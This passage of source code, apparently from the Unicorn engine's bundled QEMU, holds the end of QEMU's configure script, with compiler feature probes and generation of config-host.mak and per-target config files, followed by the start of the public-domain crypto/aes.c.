__attribute__((alias)) is supported. # This is false for Xcode 9, but has been remedied for Xcode 10. # Unfortunately, travis uses Xcode 9 by default. attralias=no cat > $TMPC << EOF int x = 1; extern const int y __attribute__((alias("x"))); int main(void) { return 0; } EOF if compile_prog "" "" ; then attralias=yes fi ######################################## # check if getauxval is available. getauxval=no cat > $TMPC << EOF #include <sys/auxv.h> int main(void) { return getauxval(AT_HWCAP) == 0; } EOF if compile_prog "" "" ; then getauxval=yes fi ######################################## # check if ccache is interfering with # semantic analysis of macros unset CCACHE_CPP2 ccache_cpp2=no cat > $TMPC << EOF static const int Z = 1; #define fn() ({ Z; }) #define TAUT(X) ((X) == Z) #define PAREN(X, Y) (X == Y) #define ID(X) (X) int main(int argc, char *argv[]) { int x = 0, y = 0; x = ID(x); x = fn(); fn(); if (PAREN(x, y)) return 0; if (TAUT(Z)) return 0; return 0; } EOF if ! compile_object "-Werror"; then ccache_cpp2=yes fi ########################################## # check for usable membarrier system call if test "$membarrier" = "yes"; then have_membarrier=no if test "$mingw32" = "yes" ; then have_membarrier=yes elif test "$linux" = "yes" ; then cat > $TMPC << EOF #include <linux/membarrier.h> #include <sys/syscall.h> #include <unistd.h> #include <stdlib.h> int main(void) { syscall(__NR_membarrier, MEMBARRIER_CMD_QUERY, 0); syscall(__NR_membarrier, MEMBARRIER_CMD_SHARED, 0); exit(0); } EOF if compile_prog "" "" ; then have_membarrier=yes fi fi if test "$have_membarrier" = "no"; then feature_not_found "membarrier" "membarrier system call not available" fi else # Do not enable it by default even for Mingw32, because it doesn't # work on Wine. membarrier=no fi ################################################# # Sparc implicitly links with --relax, which is # incompatible with -r, so --no-relax should be # given. It does no harm to give it on other # platforms too. # Note: the prototype is needed since QEMU_CFLAGS # contains -Wmissing-prototypes cat > $TMPC << EOF extern int foo(void); int foo(void) { return 0; } EOF if !
compile_object ""; then error_exit "Failed to compile object file for LD_REL_FLAGS test" fi for i in '-Wl,-r -Wl,--no-relax' -Wl,-r -r; do if do_cc -nostdlib $i -o $TMPMO $TMPO; then LD_REL_FLAGS=$i break fi done ########################################## # check for sysmacros.h have_sysmacros=no cat > $TMPC << EOF #include <sys/sysmacros.h> int main(void) { return makedev(0, 0); } EOF if compile_prog "" "" ; then have_sysmacros=yes fi ########################################## # check for _Static_assert() have_static_assert=no cat > $TMPC << EOF _Static_assert(1, "success"); int main(void) { return 0; } EOF if compile_prog "" "" ; then have_static_assert=yes fi ########################################## # check for utmpx.h, it is missing e.g. on OpenBSD have_utmpx=no cat > $TMPC << EOF #include <utmpx.h> struct utmpx user_info; int main(void) { return 0; } EOF if compile_prog "" "" ; then have_utmpx=yes fi ########################################## # check for getrandom() have_getrandom=no cat > $TMPC << EOF #include <sys/random.h> int main(void) { return getrandom(0, 0, GRND_NONBLOCK); } EOF if compile_prog "" "" ; then have_getrandom=yes fi ########################################## # checks for sanitizers have_asan=no have_ubsan=no have_asan_iface_h=no have_asan_iface_fiber=no if test "$sanitizers" = "yes" ; then write_c_skeleton if compile_prog "$CPU_CFLAGS -Werror -fsanitize=address" ""; then have_asan=yes fi # we could use a simple skeleton for flags checks, but this also # detects the static linking issue of ubsan, see also: # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=84285 cat > $TMPC << EOF #include <stdlib.h> int main(void) { void *tmp = malloc(10); return *(int *)(tmp + 2); } EOF if compile_prog "$CPU_CFLAGS -Werror -fsanitize=undefined" ""; then have_ubsan=yes fi if check_include "sanitizer/asan_interface.h" ; then have_asan_iface_h=yes fi cat > $TMPC << EOF #include <sanitizer/asan_interface.h> int main(void) { __sanitizer_start_switch_fiber(0, 0, 0); return 0; } EOF if compile_prog "$CPU_CFLAGS -Werror -fsanitize=address" "" ; then have_asan_iface_fiber=yes fi fi ########################################## # check for Apple Silicon JIT function if [ "$darwin" = "yes" ] ; then cat > $TMPC << EOF #include <pthread.h> int main() { pthread_jit_write_protect_np(0); return 0;} EOF if ! compile_prog ""; then have_pthread_jit_protect='no' else have_pthread_jit_protect='yes' fi if test "$have_pthread_jit_protect" = "yes" ; then cat > $TMPC << EOF #include "stdint.h" int main() { uint64_t commpage_sprr = (*(uint64_t*)0xFFFFFC10C); // In Apple Hypervisor, this value is not accessible and // pthread_jit_write_protect_np is essentially a no-op if (!commpage_sprr) { return 1; } else { return 0; } } EOF if ! compile_prog ""; then have_sprr='no' have_pthread_jit_protect='no' else $TMPE if [ $? -eq 0 ]; then have_sprr='yes' else have_sprr='no' fi fi fi fi ########################################## # End of CC checks # After here, no more $cc or $ld runs write_c_skeleton if test "$have_asan" = "yes"; then QEMU_CFLAGS="-fsanitize=address $QEMU_CFLAGS" QEMU_LDFLAGS="-fsanitize=address $QEMU_LDFLAGS" if test "$have_asan_iface_h" = "no" ; then echo "ASAN build enabled, but ASAN header missing." \ "Without code annotation, the report may be inferior." elif test "$have_asan_iface_fiber" = "no" ; then echo "ASAN build enabled, but ASAN header is too old." \ "Without code annotation, the report may be inferior."
fi fi if test "$have_ubsan" = "yes"; then QEMU_CFLAGS="-fsanitize=undefined $QEMU_CFLAGS" QEMU_LDFLAGS="-fsanitize=undefined $QEMU_LDFLAGS" fi # Now we've finished running tests it's OK to add -Werror to the compiler flags if test "$werror" = "yes"; then QEMU_CFLAGS="-Werror $QEMU_CFLAGS" fi if test "$solaris" = "no" ; then if $ld --version 2>/dev/null | grep "GNU ld" >/dev/null 2>/dev/null ; then QEMU_LDFLAGS="-Wl,--warn-common $QEMU_LDFLAGS" fi fi # Use ASLR, no-SEH and DEP if available if test "$mingw32" = "yes" ; then for flag in --dynamicbase --no-seh --nxcompat; do if ld_has $flag ; then QEMU_LDFLAGS="-Wl,$flag $QEMU_LDFLAGS" fi done fi # Disable OpenBSD W^X if available if test "$tcg" = "yes" && test "$targetos" = "OpenBSD"; then cat > $TMPC <<EOF int main(void) { return 0; } EOF wx_ldflags="-Wl,-z,wxneeded" if compile_prog "" "$wx_ldflags"; then QEMU_LDFLAGS="$QEMU_LDFLAGS $wx_ldflags" fi fi qemu_confdir=$sysconfdir$confsuffix qemu_localedir="$datadir/locale" # Check that the C++ compiler exists and works with the C compiler. # All the QEMU_CXXFLAGS are based on QEMU_CFLAGS. Keep this at the end so we don't miss any others that could be added. if has $cxx; then cat > $TMPC <<EOF int c_function(void); int main(void) { return c_function(); } EOF compile_object cat > $TMPCXX <<EOF extern "C" { int c_function(void); } int c_function(void) { return 42; } EOF update_cxxflags if do_cxx $QEMU_CXXFLAGS -o $TMPE $TMPCXX $TMPO $QEMU_LDFLAGS; then # C++ compiler $cxx works ok with C compiler $cc : else echo "C++ compiler $cxx does not work with C compiler $cc" echo "Disabling C++ specific optional code" cxx= fi else echo "No C++ compiler available; disabling C++ specific optional code" cxx= fi echo_version() { if test "$1" = "yes" ; then echo "($2)" fi } echo "Install prefix $prefix" echo "binary directory $(eval echo $bindir)" echo "library directory $(eval echo $libdir)" echo "libexec directory $(eval echo $libexecdir)" echo "include directory $(eval echo $includedir)" echo "config directory $(eval echo $sysconfdir)" if test "$mingw32" = "no" ; then echo "local state directory $(eval echo $local_statedir)" echo "ELF interp prefix $interp_prefix" else echo "local state directory queried at runtime" fi echo "Build directory $(pwd)" echo "Source path $source_path" echo "GIT binary $git" echo "GIT submodules $git_submodules" echo "C compiler $cc" echo "Host C compiler $host_cc" echo "C++ compiler $cxx" echo "Objective-C compiler $objcc" echo "ARFLAGS $ARFLAGS" echo "CFLAGS $CFLAGS" echo "QEMU_CFLAGS $QEMU_CFLAGS" echo "QEMU_LDFLAGS $QEMU_LDFLAGS" echo "make $make" echo "install $install" echo "host CPU $cpu" echo "host big endian $bigendian" echo "target list $target_list" echo "strip binaries $strip_opt" echo "static build $static" echo "mingw32 support $mingw32" echo "PIE $pie" echo "TCG support $tcg" echo "malloc trim support $malloc_trim" echo "membarrier $membarrier" echo "madvise $madvise" echo "posix_madvise $posix_madvise" echo "posix_memalign $posix_memalign" echo "debug stack usage $debug_stack_usage" echo "tcmalloc support $tcmalloc" echo "jemalloc support $jemalloc" echo "avx2 optimization $avx2_opt" echo "avx512f optimization $avx512f_opt" if test "$supported_cpu" = "no"; then echo echo "WARNING: SUPPORT FOR THIS HOST CPU WILL GO AWAY IN FUTURE RELEASES!" echo echo "CPU host architecture $cpu support is not currently maintained."
echo "The QEMU project intends to remove support for this host CPU in" echo "a future release if nobody volunteers to maintain it and to" echo "provide a build host for our continuous integration setup." echo "configure has succeeded and you can continue to build, but" echo "if you care about QEMU on this platform you should contact" echo "us upstream at qemu-devel@nongnu.org." fi if test "$supported_os" = "no"; then echo echo "WARNING: SUPPORT FOR THIS HOST OS WILL GO AWAY IN FUTURE RELEASES!" echo echo "Host OS $targetos support is not currently maintained." echo "The QEMU project intends to remove support for this host OS in" echo "a future release if nobody volunteers to maintain it and to" echo "provide a build host for our continuous integration setup." echo "configure has succeeded and you can continue to build, but" echo "if you care about QEMU on this platform you should contact" echo "us upstream at qemu-devel@nongnu.org." fi config_host_mak="config-host.mak" echo "# Automatically generated by configure - do not modify" > $config_host_mak echo >> $config_host_mak echo all: >> $config_host_mak echo "prefix=$prefix" >> $config_host_mak echo "bindir=$bindir" >> $config_host_mak echo "libdir=$libdir" >> $config_host_mak echo "libexecdir=$libexecdir" >> $config_host_mak echo "includedir=$includedir" >> $config_host_mak echo "sysconfdir=$sysconfdir" >> $config_host_mak echo "qemu_confdir=$qemu_confdir" >> $config_host_mak if test "$mingw32" = "no" ; then echo "qemu_localstatedir=$local_statedir" >> $config_host_mak fi echo "qemu_helperdir=$libexecdir" >> $config_host_mak echo "qemu_localedir=$qemu_localedir" >> $config_host_mak echo "libs_cpu=$libs_cpu" >> $config_host_mak echo "libs_softmmu=$libs_softmmu" >> $config_host_mak echo "GIT=$git" >> $config_host_mak echo "GIT_SUBMODULES=$git_submodules" >> $config_host_mak echo "GIT_UPDATE=$git_update" >> $config_host_mak echo "ARCH=$ARCH" >> $config_host_mak if test "$strip_opt" = "yes" ; then echo "STRIP=${strip}" >> $config_host_mak fi if test "$bigendian" = "yes" ; then echo "HOST_WORDS_BIGENDIAN=y" >> $config_host_mak fi if test "$mingw32" = "yes" ; then echo "CONFIG_WIN32=y" >> $config_host_mak rc_version=$(cat $source_path/VERSION) version_major=${rc_version%%.*} rc_version=${rc_version#*.} version_minor=${rc_version%%.*} rc_version=${rc_version#*.} version_subminor=${rc_version%%.*} version_micro=0 echo "CONFIG_FILEVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak echo "CONFIG_PRODUCTVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak else echo "CONFIG_POSIX=y" >> $config_host_mak fi if test "$linux" = "yes" ; then echo "CONFIG_LINUX=y" >> $config_host_mak fi if test "$darwin" = "yes" ; then echo "CONFIG_DARWIN=y" >> $config_host_mak fi if test "$solaris" = "yes" ; then echo "CONFIG_SOLARIS=y" >> $config_host_mak fi if test "$haiku" = "yes" ; then echo "CONFIG_HAIKU=y" >> $config_host_mak fi if test "$static" = "yes" ; then echo "CONFIG_STATIC=y" >> $config_host_mak fi qemu_version=$(head $source_path/VERSION) echo "VERSION=$qemu_version" >>$config_host_mak echo "PKGVERSION=$pkgversion" >>$config_host_mak echo "SRC_PATH=$source_path" >> $config_host_mak echo "TARGET_DIRS=$target_list" >> $config_host_mak if test "$sync_file_range" = "yes" ; then echo "CONFIG_SYNC_FILE_RANGE=y" >> $config_host_mak fi if test "$dup3" = "yes" ; then echo "CONFIG_DUP3=y" >> $config_host_mak fi if test "$prctl_pr_set_timerslack" = "yes" ; then echo 
"CONFIG_PRCTL_PR_SET_TIMERSLACK=y" >> $config_host_mak fi if test "$epoll" = "yes" ; then echo "CONFIG_EPOLL=y" >> $config_host_mak fi if test "$clock_adjtime" = "yes" ; then echo "CONFIG_CLOCK_ADJTIME=y" >> $config_host_mak fi if test "$syncfs" = "yes" ; then echo "CONFIG_SYNCFS=y" >> $config_host_mak fi if test "$sem_timedwait" = "yes" ; then echo "CONFIG_SEM_TIMEDWAIT=y" >> $config_host_mak fi if test "$strchrnul" = "yes" ; then echo "HAVE_STRCHRNUL=y" >> $config_host_mak fi if test "$st_atim" = "yes" ; then echo "HAVE_STRUCT_STAT_ST_ATIM=y" >> $config_host_mak fi if test "$byteswap_h" = "yes" ; then echo "CONFIG_BYTESWAP_H=y" >> $config_host_mak fi if test "$bswap_h" = "yes" ; then echo "CONFIG_MACHINE_BSWAP_H=y" >> $config_host_mak fi if test "$have_broken_size_max" = "yes" ; then echo "HAVE_BROKEN_SIZE_MAX=y" >> $config_host_mak fi if test "$membarrier" = "yes" ; then echo "CONFIG_MEMBARRIER=y" >> $config_host_mak fi if test "$signalfd" = "yes" ; then echo "CONFIG_SIGNALFD=y" >> $config_host_mak fi if test "$tcg" = "yes"; then echo "CONFIG_TCG=y" >> $config_host_mak fi if test "$madvise" = "yes" ; then echo "CONFIG_MADVISE=y" >> $config_host_mak fi if test "$posix_madvise" = "yes" ; then echo "CONFIG_POSIX_MADVISE=y" >> $config_host_mak fi if test "$posix_memalign" = "yes" ; then echo "CONFIG_POSIX_MEMALIGN=y" >> $config_host_mak fi if test "$malloc_trim" = "yes" ; then echo "CONFIG_MALLOC_TRIM=y" >> $config_host_mak fi if test "$avx2_opt" = "yes" ; then echo "CONFIG_AVX2_OPT=y" >> $config_host_mak fi if test "$avx512f_opt" = "yes" ; then echo "CONFIG_AVX512F_OPT=y" >> $config_host_mak fi # XXX: suppress that if [ "$bsd" = "yes" ] ; then echo "CONFIG_BSD=y" >> $config_host_mak fi if test "$debug_stack_usage" = "yes" ; then echo "CONFIG_DEBUG_STACK_USAGE=y" >> $config_host_mak fi if test "$open_by_handle_at" = "yes" ; then echo "CONFIG_OPEN_BY_HANDLE=y" >> $config_host_mak fi if test "$linux_magic_h" = "yes" ; then echo "CONFIG_LINUX_MAGIC_H=y" >> $config_host_mak fi if test "$pragma_diagnostic_available" = "yes" ; then echo "CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE=y" >> $config_host_mak fi if test "$have_asan_iface_fiber" = "yes" ; then echo "CONFIG_ASAN_IFACE_FIBER=y" >> $config_host_mak fi if test "$has_environ" = "yes" ; then echo "CONFIG_HAS_ENVIRON=y" >> $config_host_mak fi if test "$cpuid_h" = "yes" ; then echo "CONFIG_CPUID_H=y" >> $config_host_mak fi if test "$int128" = "yes" ; then echo "CONFIG_INT128=y" >> $config_host_mak fi if test "$atomic128" = "yes" ; then echo "CONFIG_ATOMIC128=y" >> $config_host_mak fi if test "$cmpxchg128" = "yes" ; then echo "CONFIG_CMPXCHG128=y" >> $config_host_mak fi if test "$atomic64" = "yes" ; then echo "CONFIG_ATOMIC64=y" >> $config_host_mak fi if test "$attralias" = "yes" ; then echo "CONFIG_ATTRIBUTE_ALIAS=y" >> $config_host_mak fi if test "$getauxval" = "yes" ; then echo "CONFIG_GETAUXVAL=y" >> $config_host_mak fi if test "$have_sysmacros" = "yes" ; then echo "CONFIG_SYSMACROS=y" >> $config_host_mak fi if test "$have_static_assert" = "yes" ; then echo "CONFIG_STATIC_ASSERT=y" >> $config_host_mak fi if test "$have_utmpx" = "yes" ; then echo "HAVE_UTMPX=y" >> $config_host_mak fi if test "$have_getrandom" = "yes" ; then echo "CONFIG_GETRANDOM=y" >> $config_host_mak fi if test "$have_pthread_jit_protect" = "yes" ; then echo "HAVE_PTHREAD_JIT_PROTECT=y" >> $config_host_mak fi if test "$have_sprr" = "yes" ; then echo "HAVE_SPRR=y" >> $config_host_mak fi # Hold two types of flag: # CONFIG_THREAD_SETNAME_BYTHREAD - we've got a way of setting the name 
# Hold two types of flag:
#   CONFIG_THREAD_SETNAME_BYTHREAD  - we've got a way of setting the name on
#                                     a thread we have a handle to
#   CONFIG_PTHREAD_SETNAME_NP_W_TID - A way of doing it on a particular
#                                     platform
if test "$pthread_setname_np_w_tid" = "yes" ; then
  echo "CONFIG_THREAD_SETNAME_BYTHREAD=y" >> $config_host_mak
  echo "CONFIG_PTHREAD_SETNAME_NP_W_TID=y" >> $config_host_mak
elif test "$pthread_setname_np_wo_tid" = "yes" ; then
  echo "CONFIG_THREAD_SETNAME_BYTHREAD=y" >> $config_host_mak
  echo "CONFIG_PTHREAD_SETNAME_NP_WO_TID=y" >> $config_host_mak
fi

if test "$ARCH" = "sparc64" ; then
  QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/sparc $QEMU_INCLUDES"
elif test "$ARCH" = "s390x" ; then
  QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/s390 $QEMU_INCLUDES"
elif test "$ARCH" = "x86_64" || test "$ARCH" = "x32" ; then
  QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/i386 $QEMU_INCLUDES"
elif test "$ARCH" = "ppc64" ; then
  QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/ppc $QEMU_INCLUDES"
elif test "$ARCH" = "riscv32" || test "$ARCH" = "riscv64" ; then
  QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/riscv $QEMU_INCLUDES"
else
  QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/\$(ARCH) $QEMU_INCLUDES"
fi

echo "TOOLS=$tools" >> $config_host_mak
echo "MAKE=$make" >> $config_host_mak
echo "INSTALL=$install" >> $config_host_mak
echo "INSTALL_DIR=$install -d -m 0755" >> $config_host_mak
echo "INSTALL_DATA=$install -c -m 0644" >> $config_host_mak
echo "INSTALL_PROG=$install -c -m 0755" >> $config_host_mak
echo "INSTALL_LIB=$install -c -m 0644" >> $config_host_mak
echo "CC=$cc" >> $config_host_mak
if $iasl -h > /dev/null 2>&1; then
  echo "IASL=$iasl" >> $config_host_mak
fi
echo "HOST_CC=$host_cc" >> $config_host_mak
echo "CXX=$cxx" >> $config_host_mak
echo "OBJCC=$objcc" >> $config_host_mak
echo "AR=$ar" >> $config_host_mak
echo "ARFLAGS=$ARFLAGS" >> $config_host_mak
echo "AS=$as" >> $config_host_mak
echo "CCAS=$ccas" >> $config_host_mak
echo "CPP=$cpp" >> $config_host_mak
echo "OBJCOPY=$objcopy" >> $config_host_mak
echo "LD=$ld" >> $config_host_mak
echo "RANLIB=$ranlib" >> $config_host_mak
echo "NM=$nm" >> $config_host_mak
echo "PKG_CONFIG=$pkg_config_exe" >> $config_host_mak
echo "CFLAGS=$CFLAGS" >> $config_host_mak
echo "CFLAGS_NOPIE=$CFLAGS_NOPIE" >> $config_host_mak
echo "QEMU_CFLAGS=$QEMU_CFLAGS" >> $config_host_mak
echo "QEMU_CXXFLAGS=$QEMU_CXXFLAGS" >> $config_host_mak
echo "QEMU_INCLUDES=$QEMU_INCLUDES" >> $config_host_mak
echo "QEMU_LDFLAGS=$QEMU_LDFLAGS" >> $config_host_mak
echo "LDFLAGS_NOPIE=$LDFLAGS_NOPIE" >> $config_host_mak
echo "LD_REL_FLAGS=$LD_REL_FLAGS" >> $config_host_mak
echo "LD_I386_EMULATION=$ld_i386_emulation" >> $config_host_mak
echo "LIBS+=$LIBS" >> $config_host_mak
echo "LIBS_TOOLS+=$libs_tools" >> $config_host_mak
echo "PTHREAD_LIB=$PTHREAD_LIB" >> $config_host_mak
echo "EXESUF=$EXESUF" >> $config_host_mak
echo "DSOSUF=$DSOSUF" >> $config_host_mak
echo "LDFLAGS_SHARED=$LDFLAGS_SHARED" >> $config_host_mak
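
# Added commentary (not part of the original script): everything above went
# into the single host-wide config-host.mak. The loop below runs once per
# entry in $target_list and emits a per-target <target>/config-target.mak
# with TARGET_* keys (name, base architecture, endianness, alignment), which
# the target Makefiles include on top of the host settings.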
for target in $target_list; do
    target_dir="$target"
    config_target_mak=$target_dir/config-target.mak
    target_name=$(echo $target | cut -d '-' -f 1)
    target_aligned_only="no"
    case "$target_name" in
      alpha|hppa|mips64el|mips64|mipsel|mips|mipsn32|mipsn32el|sh4|sh4eb|sparc|sparc64|sparc32plus|xtensa|xtensaeb)
        target_aligned_only="yes"
      ;;
    esac
    target_bigendian="no"
    case "$target_name" in
      hppa|lm32|m68k|microblaze|mips|mipsn32|mips64|moxie|or1k|ppc|ppc64|ppc64abi32|s390x|sh4eb|sparc|sparc64|sparc32plus|xtensaeb)
        target_bigendian="yes"
      ;;
    esac
    target_user_only="no"
    target_linux_user="no"
    target_bsd_user="no"
    target_softmmu="yes"

    mkdir -p $target_dir
    echo "# Automatically generated by configure - do not modify" > $config_target_mak

    mttcg="no"
    TARGET_ARCH="$target_name"
    TARGET_BASE_ARCH=""
    TARGET_ABI_DIR=""
    case "$target_name" in
      i386)
        mttcg="yes"
        TARGET_SYSTBL_ABI=i386
      ;;
      x86_64)
        TARGET_BASE_ARCH=i386
        TARGET_SYSTBL_ABI=common,64
        mttcg="yes"
      ;;
      alpha)
        mttcg="yes"
        TARGET_SYSTBL_ABI=common
      ;;
      arm)
        TARGET_ARCH=arm
        TARGET_SYSTBL_ABI=common,oabi
        mttcg="yes"
      ;;
      aarch64)
        TARGET_ARCH=aarch64
        TARGET_BASE_ARCH=arm
        mttcg="yes"
      ;;
      cris)
      ;;
      hppa)
        mttcg="yes"
        TARGET_SYSTBL_ABI=common,32
      ;;
      lm32)
      ;;
      m68k)
        TARGET_SYSTBL_ABI=common
      ;;
      microblaze|microblazeel)
        TARGET_ARCH=microblaze
        TARGET_SYSTBL_ABI=common
        echo "TARGET_ABI32=y" >> $config_target_mak
      ;;
      mips|mipsel)
        mttcg="yes"
        TARGET_ARCH=mips
        echo "TARGET_ABI_MIPSO32=y" >> $config_target_mak
        TARGET_SYSTBL_ABI=o32
      ;;
      mipsn32|mipsn32el)
        mttcg="yes"
        TARGET_ARCH=mips64
        TARGET_BASE_ARCH=mips
        echo "TARGET_ABI_MIPSN32=y" >> $config_target_mak
        echo "TARGET_ABI32=y" >> $config_target_mak
        TARGET_SYSTBL_ABI=n32
      ;;
      mips64|mips64el)
        mttcg="no"
        TARGET_ARCH=mips64
        TARGET_BASE_ARCH=mips
        echo "TARGET_ABI_MIPSN64=y" >> $config_target_mak
        TARGET_SYSTBL_ABI=n64
      ;;
      moxie)
      ;;
      nios2)
      ;;
      or1k)
        TARGET_ARCH=openrisc
        TARGET_BASE_ARCH=openrisc
      ;;
      ppc)
        TARGET_SYSTBL_ABI=common,nospu,32
      ;;
      ppc64)
        TARGET_BASE_ARCH=ppc
        TARGET_ABI_DIR=ppc
        TARGET_SYSTBL_ABI=common,nospu,64
        mttcg=yes
      ;;
      ppc64le)
        TARGET_ARCH=ppc64
        TARGET_BASE_ARCH=ppc
        TARGET_ABI_DIR=ppc
        TARGET_SYSTBL_ABI=common,nospu,64
        mttcg=yes
      ;;
      ppc64abi32)
        TARGET_ARCH=ppc64
        TARGET_BASE_ARCH=ppc
        TARGET_ABI_DIR=ppc
        TARGET_SYSTBL_ABI=common,nospu,32
        echo "TARGET_ABI32=y" >> $config_target_mak
      ;;
      riscv32)
        TARGET_BASE_ARCH=riscv
        TARGET_ABI_DIR=riscv
        mttcg=yes
      ;;
      riscv64)
        TARGET_BASE_ARCH=riscv
        TARGET_ABI_DIR=riscv
        mttcg=yes
      ;;
      rx)
        TARGET_ARCH=rx
        target_compiler=$cross_cc_rx
      ;;
      sh4|sh4eb)
        TARGET_ARCH=sh4
        TARGET_SYSTBL_ABI=common
      ;;
      sparc)
        TARGET_SYSTBL_ABI=common,32
      ;;
      sparc64)
        TARGET_BASE_ARCH=sparc
        TARGET_SYSTBL_ABI=common,64
      ;;
      sparc32plus)
        TARGET_ARCH=sparc64
        TARGET_BASE_ARCH=sparc
        TARGET_ABI_DIR=sparc
        TARGET_SYSTBL_ABI=common,32
        echo "TARGET_ABI32=y" >> $config_target_mak
      ;;
      s390x)
        TARGET_SYSTBL_ABI=common,64
        mttcg=yes
      ;;
      tilegx)
      ;;
      tricore)
        TARGET_ARCH=tricore
        TARGET_BASE_ARCH=tricore
      ;;
      unicore32)
      ;;
      xtensa|xtensaeb)
        TARGET_ARCH=xtensa
        TARGET_SYSTBL_ABI=common
        mttcg="yes"
      ;;
      *)
        error_exit "Unsupported target CPU"
      ;;
    esac
    # TARGET_BASE_ARCH needs to be defined after TARGET_ARCH
    if [ "$TARGET_BASE_ARCH" = "" ]; then
      TARGET_BASE_ARCH=$TARGET_ARCH
    fi

    #symlink "$source_path/Makefile.target" "$target_dir/Makefile"

    upper() {
        echo "$@"| LC_ALL=C tr '[a-z]' '[A-Z]'
    }

    target_arch_name="$(upper $TARGET_ARCH)"
    echo "TARGET_$target_arch_name=y" >> $config_target_mak
    echo "TARGET_NAME=$target_name" >> $config_target_mak
    echo "TARGET_BASE_ARCH=$TARGET_BASE_ARCH" >> $config_target_mak
    if [ "$TARGET_ABI_DIR" = "" ]; then
      TARGET_ABI_DIR=$TARGET_ARCH
    fi
    echo "TARGET_ABI_DIR=$TARGET_ABI_DIR" >> $config_target_mak
    if [ "$HOST_VARIANT_DIR" != "" ]; then
        echo "HOST_VARIANT_DIR=$HOST_VARIANT_DIR" >> $config_target_mak
    fi
    if [ "$TARGET_SYSTBL_ABI" != "" ]; then
        echo "TARGET_SYSTBL_ABI=$TARGET_SYSTBL_ABI" >> $config_target_mak
    fi
    if test "$target_aligned_only" = "yes" ; then
      echo "TARGET_ALIGNED_ONLY=y" >> $config_target_mak
    fi
    if test "$target_bigendian" = "yes" ; then
      echo "TARGET_WORDS_BIGENDIAN=y" >> $config_target_mak
    fi
    if test "$target_softmmu" = "yes" ; then
      echo "CONFIG_SOFTMMU=y" >> $config_target_mak
      if test "$mttcg" = "yes" ; then
        echo "TARGET_SUPPORTS_MTTCG=y" >> $config_target_mak
      fi
    fi
    if test "$target_user_only" = "yes" ; then
      echo "CONFIG_USER_ONLY=y" >> $config_target_mak
    fi
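    # Added commentary (not part of the original script): this tree
    # hard-wires target_softmmu="yes" and leaves target_user_only,
    # target_linux_user and target_bsd_user at "no" at the top of the loop,
    # so the CONFIG_USER_ONLY branch above and the CONFIG_LINUX_USER /
    # CONFIG_BSD_USER branches below never fire and remain only as
    # inherited QEMU plumbing.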
    if test "$target_linux_user" = "yes" ; then
      echo "CONFIG_LINUX_USER=y" >> $config_target_mak
    fi
    if test "$target_bsd_user" = "yes" ; then
      echo "CONFIG_BSD_USER=y" >> $config_target_mak
    fi

    # generate QEMU_CFLAGS/QEMU_LDFLAGS for targets
    cflags=""
    ldflags=""

    case "$ARCH" in
    alpha)
      # Ensure there's only a single GP
      cflags="-msmall-data $cflags"
    ;;
    esac

    echo "QEMU_LDFLAGS+=$ldflags" >> $config_target_mak
    echo "QEMU_CFLAGS+=$cflags" >> $config_target_mak

done # for target in $targets

if test "$ccache_cpp2" = "yes"; then
  echo "export CCACHE_CPP2=y" >> $config_host_mak
fi

# Save the configure command line for later reuse.
cat <<EOD >config.status
#!/bin/sh
# Generated by configure.
# Run this file to recreate the current configuration.
# Compiler output produced by configure, useful for debugging
# configure, is in config.log if it exists.
EOD

preserve_env() {
    envname=$1

    eval envval=\$$envname

    if test -n "$envval"
    then
        echo "$envname='$envval'" >> config.status
        echo "export $envname" >> config.status
    else
        echo "unset $envname" >> config.status
    fi
}

# Preserve various env variables that influence what
# features/build target configure will detect
preserve_env AR
preserve_env AS
preserve_env CC
preserve_env CPP
preserve_env CXX
preserve_env INSTALL
preserve_env LD
preserve_env LD_LIBRARY_PATH
preserve_env LIBTOOL
preserve_env MAKE
preserve_env NM
preserve_env OBJCOPY
preserve_env PATH
preserve_env PKG_CONFIG
preserve_env PKG_CONFIG_LIBDIR
preserve_env PKG_CONFIG_PATH
preserve_env STRIP

printf "exec" >>config.status
printf " '%s'" "$0" "$@" >>config.status
echo ' "$@"' >>config.status
chmod +x config.status

rm -r "$TMPDIR1"

unicorn-2.1.1/qemu/crypto/aes.c

/**
 *
 * aes.c - integrated in QEMU by Fabrice Bellard from the OpenSSL project.
 */
/*
 * rijndael-alg-fst.c
 *
 * @version 3.0 (December 2000)
 *
 * Optimised ANSI C code for the Rijndael cipher (now AES)
 *
 * @author Vincent Rijmen <vincent.rijmen@esat.kuleuven.ac.be>
 * @author Antoon Bosselaers <antoon.bosselaers@esat.kuleuven.ac.be>
 * @author Paulo Barreto <paulo.barreto@terra.com.br>
 *
 * This code is hereby placed in the public domain.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE
 * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
 * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
 * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#include "qemu/osdep.h"
#include "crypto/aes.h"

typedef uint32_t u32;
typedef uint8_t u8;

/* This controls loop-unrolling in aes_core.c */
#undef FULL_UNROLL

# define GETU32(pt) (((u32)(pt)[0] << 24) ^ ((u32)(pt)[1] << 16) ^ ((u32)(pt)[2] << 8) ^ ((u32)(pt)[3]))
